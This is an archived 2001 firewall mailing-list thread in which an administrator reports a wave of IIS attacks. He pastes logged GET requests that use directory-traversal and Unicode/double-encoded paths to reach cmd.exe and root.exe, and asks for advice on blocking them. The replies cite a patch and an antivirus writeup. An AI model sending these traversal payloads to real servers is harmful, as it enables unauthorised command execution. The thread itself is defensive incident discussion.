RE: [FW1] New worm on the road?

To: "Allison, Mark" <[email protected]>, "Patrick Coomans" <[email protected]>

Subject: RE: [FW1] New worm on the road?

From: "James Cabe" <[email protected]>

Date: Mon, 24 Sep 2001 08:36:40 -0400

Cc: [email protected]

Sender: [email protected]

Thread-index: AcFE9U2WrrN+lyuhQnq28BhkS45AcgAADdBQ

Thread-topic: [FW1] New worm on the road?

checkout www.intrusion.com

-----Original Message-----
From: Allison, Mark [mailto:[email protected]]
Sent: Wednesday, September 19, 2001 11:05 AM
To: 'Patrick Coomans'
Cc: '[email protected]'
Subject: RE: [FW1] New worm on the road?

A patch was released from Microsoft in October 2000. Follow the Symantic link below.

http://www.symantec.com/avcenter/venc/data/[email protected]

Mark Allison
Global Cash Access / Central Credit, L.L.C.
[702-855-3037 mailto:mallison@central-credit.net]

-----Original Message-----
From: Patrick Coomans [mailto:[email protected]]
Sent: Tuesday, September 18, 2001 2:36 PM
To: [email protected]
Subject: [FW1] New worm on the road?

Since this evening I am experiencing massive attacks on HTTP (IIS oriented I presume) from many different IP addresses.

They all look like:

GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

Is anyone aware that this is some new kind of worm?

Now my FW1 question: can I create a HTTP resource (secure server) that blocks all requests that e.g. have a .EXE in it ? Or would that slow my FW1's down to much?

Any other suggestions for good products that can do HTTP content inspection and that cooperate or can co-exist with fw1 ?

Thanks,

Patrick

-- This message has been processed by IPM's Messaging Management System (MMS), formerly known as WorldSecure Server, for Viruses & Email Content. It is intended to be viewed only by the individual or entity to whom it is addressed.

-- For further information about IPM and the services we offer, please visit our website at www.ipm.com or contact us at.

-- IPM - If it's remotely possible, we do it!